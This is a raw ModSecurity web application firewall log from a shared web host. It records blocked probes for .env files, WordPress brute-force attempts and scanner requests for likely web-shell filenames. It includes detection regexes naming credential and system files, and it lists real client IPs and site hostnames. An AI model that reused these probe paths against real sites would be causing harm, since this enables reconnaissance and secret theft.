[Tue May 26 16:52:06.795808 2026] [security2:error] [pid 823496:tid 823660] [client 20.63.34.22:12177] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/inputs.php"] [unique_id "ahWCXpa08mrtyBNpA4PnPAAAACA"]
[Tue May 26 16:52:07.350387 2026] [security2:error] [pid 823496:tid 823725] [client 77.83.39.197:37836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/.env"] [unique_id "ahWCX5a08mrtyBNpA4PnRAAAAGE"]
[Tue May 26 16:52:07.504852 2026] [security2:error] [pid 823496:tid 823672] [client 62.60.130.233:65533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rsmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahWCX5a08mrtyBNpA4PnRwAAACw"]
[Tue May 26 16:52:07.727714 2026] [security2:error] [pid 823496:tid 823654] [client 117.198.37.168:57050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCX5a08mrtyBNpA4PnTQAAABo"]
[Tue May 26 16:52:07.727828 2026] [security2:error] [pid 823496:tid 823654] [client 117.198.37.168:57050] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCX5a08mrtyBNpA4PnTQAAABo"]
[Tue May 26 16:52:07.930938 2026] [security2:error] [pid 823496:tid 823701] [client 62.60.130.233:64585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rsmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahWCX5a08mrtyBNpA4PnUwAAAEk"], referer: https://www.reddit.com/
[Tue May 26 16:52:08.178777 2026] [security2:error] [pid 823496:tid 823744] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCXpa08mrtyBNpA4PnOwAAAHQ"]
[Tue May 26 16:52:09.752366 2026] [security2:error] [pid 823496:tid 823681] [client 20.63.34.22:12264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/samll.php"] [unique_id "ahWCYZa08mrtyBNpA4PnawAAADU"]
[Tue May 26 16:52:09.752531 2026] [security2:error] [pid 823496:tid 823681] [client 20.63.34.22:12264] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/samll.php"] [unique_id "ahWCYZa08mrtyBNpA4PnawAAADU"]
[Tue May 26 16:52:09.998075 2026] [security2:error] [pid 823496:tid 823651] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCYJa08mrtyBNpA4PnXQAAABc"]
[Tue May 26 16:52:10.354488 2026] [security2:error] [pid 823496:tid 823704] [client 20.63.34.22:12283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWCYpa08mrtyBNpA4PndwAAAEw"]
[Tue May 26 16:52:10.354636 2026] [security2:error] [pid 823496:tid 823704] [client 20.63.34.22:12283] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWCYpa08mrtyBNpA4PndwAAAEw"]
[Tue May 26 16:52:11.306989 2026] [security2:error] [pid 823496:tid 823705] [client 74.7.244.33:38920] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mail.sbvschools.com"] [uri "/index.php"] [unique_id "ahWCX5a08mrtyBNpA4PnUgAAAE0"]
[Tue May 26 16:52:11.602683 2026] [security2:error] [pid 823496:tid 823712] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCYpa08mrtyBNpA4PncgAAAFQ"]
[Tue May 26 16:52:13.417786 2026] [security2:error] [pid 823496:tid 823744] [client 222.254.153.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCY5a08mrtyBNpA4PniAAAAHQ"]
[Tue May 26 16:52:13.797603 2026] [security2:error] [pid 823496:tid 823679] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCZJa08mrtyBNpA4PnkAAAADM"]
[Tue May 26 16:52:13.936949 2026] [security2:error] [pid 817651:tid 817888] [client 20.63.34.22:12268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/favicon.php"] [unique_id "ahWCZdlGRCPPN1dS2y3D3AAAAPA"]
[Tue May 26 16:52:13.937063 2026] [security2:error] [pid 817651:tid 817888] [client 20.63.34.22:12268] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/favicon.php"] [unique_id "ahWCZdlGRCPPN1dS2y3D3AAAAPA"]
[Tue May 26 16:52:14.686365 2026] [security2:error] [pid 817651:tid 817884] [client 20.63.34.22:12242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/aboutc.php"] [unique_id "ahWCZtlGRCPPN1dS2y3D4gAAAOw"]
[Tue May 26 16:52:14.686478 2026] [security2:error] [pid 817651:tid 817884] [client 20.63.34.22:12242] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/aboutc.php"] [unique_id "ahWCZtlGRCPPN1dS2y3D4gAAAOw"]
[Tue May 26 16:52:15.199828 2026] [security2:error] [pid 823496:tid 823642] [client 3.79.134.69:42236] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWCZ5a08mrtyBNpA4PntwAAAA4"], referer: https://thegoodsporting.com
[Tue May 26 16:52:15.524127 2026] [security2:error] [pid 817651:tid 817781] [client 20.63.34.22:12185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-load.php"] [unique_id "ahWCZ9lGRCPPN1dS2y3D6gAAAIU"]
[Tue May 26 16:52:15.524273 2026] [security2:error] [pid 817651:tid 817781] [client 20.63.34.22:12185] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-load.php"] [unique_id "ahWCZ9lGRCPPN1dS2y3D6gAAAIU"]
[Tue May 26 16:52:16.966252 2026] [security2:error] [pid 823496:tid 823629] [client 74.7.244.33:47754] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "mail.sbvschools.com"] [uri "/index.php"] [unique_id "ahWCaJa08mrtyBNpA4PnygAAAWE"]
[Tue May 26 16:52:17.045612 2026] [security2:error] [pid 823496:tid 823703] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCZpa08mrtyBNpA4PnsAAAAEs"]
[Tue May 26 16:52:18.019467 2026] [security2:error] [pid 823496:tid 823643] [client 117.198.37.168:57367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCapa08mrtyBNpA4Pn1wAAAA8"]
[Tue May 26 16:52:18.019559 2026] [security2:error] [pid 823496:tid 823643] [client 117.198.37.168:57367] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCapa08mrtyBNpA4Pn1wAAAA8"]
[Tue May 26 16:52:18.522596 2026] [security2:error] [pid 823496:tid 823674] [client 20.63.34.22:12160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/aevly.php"] [unique_id "ahWCapa08mrtyBNpA4Pn4gAAAC4"]
[Tue May 26 16:52:18.522748 2026] [security2:error] [pid 823496:tid 823674] [client 20.63.34.22:12160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/aevly.php"] [unique_id "ahWCapa08mrtyBNpA4Pn4gAAAC4"]
[Tue May 26 16:52:18.640456 2026] [security2:error] [pid 823496:tid 823664] [client 45.132.227.31:40155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWCapa08mrtyBNpA4Pn2wAAACQ"]
[Tue May 26 16:52:18.646039 2026] [security2:error] [pid 817651:tid 817806] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCaNlGRCPPN1dS2y3D8QAAAJ4"]
[Tue May 26 16:52:18.842180 2026] [security2:error] [pid 817651:tid 817797] [client 172.224.241.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWCatlGRCPPN1dS2y3D_QAAAJU"]
[Tue May 26 16:52:19.373635 2026] [security2:error] [pid 817651:tid 817824] [client 20.63.34.22:12276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/atkno.php"] [unique_id "ahWCa9lGRCPPN1dS2y3D_wAAALA"]
[Tue May 26 16:52:19.373771 2026] [security2:error] [pid 817651:tid 817824] [client 20.63.34.22:12276] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/atkno.php"] [unique_id "ahWCa9lGRCPPN1dS2y3D_wAAALA"]
[Tue May 26 16:52:19.876836 2026] [security2:error] [pid 817651:tid 817881] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCatlGRCPPN1dS2y3D-AAAAOk"]
[Tue May 26 16:52:20.137449 2026] [security2:error] [pid 817651:tid 817897] [client 20.63.34.22:12284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/mini.php"] [unique_id "ahWCbNlGRCPPN1dS2y3ECQAAAPk"]
[Tue May 26 16:52:20.137575 2026] [security2:error] [pid 817651:tid 817897] [client 20.63.34.22:12284] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/mini.php"] [unique_id "ahWCbNlGRCPPN1dS2y3ECQAAAPk"]
[Tue May 26 16:52:21.525940 2026] [security2:error] [pid 823496:tid 823640] [client 114.119.157.37:34725] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWCbZa08mrtyBNpA4PoBQAAAAw"], referer: http://haddingtonwines.com/cart?remove_item=350db081a661525235354dd3e19b8c05
[Tue May 26 16:52:21.587289 2026] [security2:error] [pid 817651:tid 817830] [client 176.65.139.229:16470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWCbdlGRCPPN1dS2y3EFgAAALY"]
[Tue May 26 16:52:21.907739 2026] [security2:error] [pid 823496:tid 823715] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCbJa08mrtyBNpA4Pn9wAAAFc"]
[Tue May 26 16:52:21.939101 2026] [security2:error] [pid 823496:tid 823668] [client 114.119.136.109:54345] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/robots.txt"] [unique_id "ahWCbZa08mrtyBNpA4PoCQAAACg"]
[Tue May 26 16:52:22.490159 2026] [security2:error] [pid 817651:tid 817735] [remote 74.7.241.58:41816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWCbtlGRCPPN1dS2y3EHQAAyFM"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:52:23.696262 2026] [security2:error] [pid 817651:tid 817674] [remote 198.38.81.14:39518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWCb9lGRCPPN1dS2y3EJAAA8hY"]
[Tue May 26 16:52:23.762509 2026] [security2:error] [pid 823496:tid 823682] [client 20.63.34.22:12193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-thi.php"] [unique_id "ahWCb5a08mrtyBNpA4PoIgAAADY"]
[Tue May 26 16:52:23.762662 2026] [security2:error] [pid 823496:tid 823682] [client 20.63.34.22:12193] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-thi.php"] [unique_id "ahWCb5a08mrtyBNpA4PoIgAAADY"]
[Tue May 26 16:52:23.854348 2026] [security2:error] [pid 817651:tid 817811] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCbtlGRCPPN1dS2y3EHAAAAKM"]
[Tue May 26 16:52:24.124984 2026] [security2:error] [pid 823496:tid 823579] [remote 52.18.195.140:35900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWCb5a08mrtyBNpA4PoJAAADVA"]
[Tue May 26 16:52:24.421373 2026] [security2:error] [pid 823496:tid 823577] [remote 94.76.235.103:59088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWCcJa08mrtyBNpA4PoJQAAVU4"]
[Tue May 26 16:52:25.065513 2026] [security2:error] [pid 823496:tid 823665] [client 20.63.34.22:12164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWCcZa08mrtyBNpA4PoNAAAACU"]
[Tue May 26 16:52:25.065658 2026] [security2:error] [pid 823496:tid 823665] [client 20.63.34.22:12164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWCcZa08mrtyBNpA4PoNAAAACU"]
[Tue May 26 16:52:25.174817 2026] [security2:error] [pid 823496:tid 823654] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCb5a08mrtyBNpA4PoHgAAABo"]
[Tue May 26 16:52:26.022931 2026] [security2:error] [pid 817651:tid 817775] [remote 121.200.216.55:56436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWCcdlGRCPPN1dS2y3ELAAAv3s"]
[Tue May 26 16:52:26.645752 2026] [security2:error] [pid 817651:tid 817896] [client 114.119.150.15:28641] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/coun/5740deep_signature.pdf"] [unique_id "ahWCctlGRCPPN1dS2y3EMQAAAPg"], referer: https://www.ucdc.co.in/upload/coun?C=M%3BO%3DA
[Tue May 26 16:52:26.766707 2026] [security2:error] [pid 817651:tid 817828] [client 20.63.34.22:12239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/amax.php"] [unique_id "ahWCctlGRCPPN1dS2y3ENQAAALQ"]
[Tue May 26 16:52:26.766850 2026] [security2:error] [pid 817651:tid 817828] [client 20.63.34.22:12239] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/amax.php"] [unique_id "ahWCctlGRCPPN1dS2y3ENQAAALQ"]
[Tue May 26 16:52:27.278397 2026] [security2:error] [pid 823496:tid 823755] [client 20.63.34.22:12176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wehrman.php"] [unique_id "ahWCc5a08mrtyBNpA4PoVAAAAH8"]
[Tue May 26 16:52:27.278530 2026] [security2:error] [pid 823496:tid 823755] [client 20.63.34.22:12176] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wehrman.php"] [unique_id "ahWCc5a08mrtyBNpA4PoVAAAAH8"]
[Tue May 26 16:52:27.484023 2026] [security2:error] [pid 817651:tid 817858] [client 176.65.139.229:22676] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shreegajanan.onesoft.in"] [uri "/.env"] [unique_id "ahWCc9lGRCPPN1dS2y3EPQAAANI"]
[Tue May 26 16:52:27.720132 2026] [security2:error] [pid 823496:tid 823659] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCcpa08mrtyBNpA4PoSQAAAB8"]
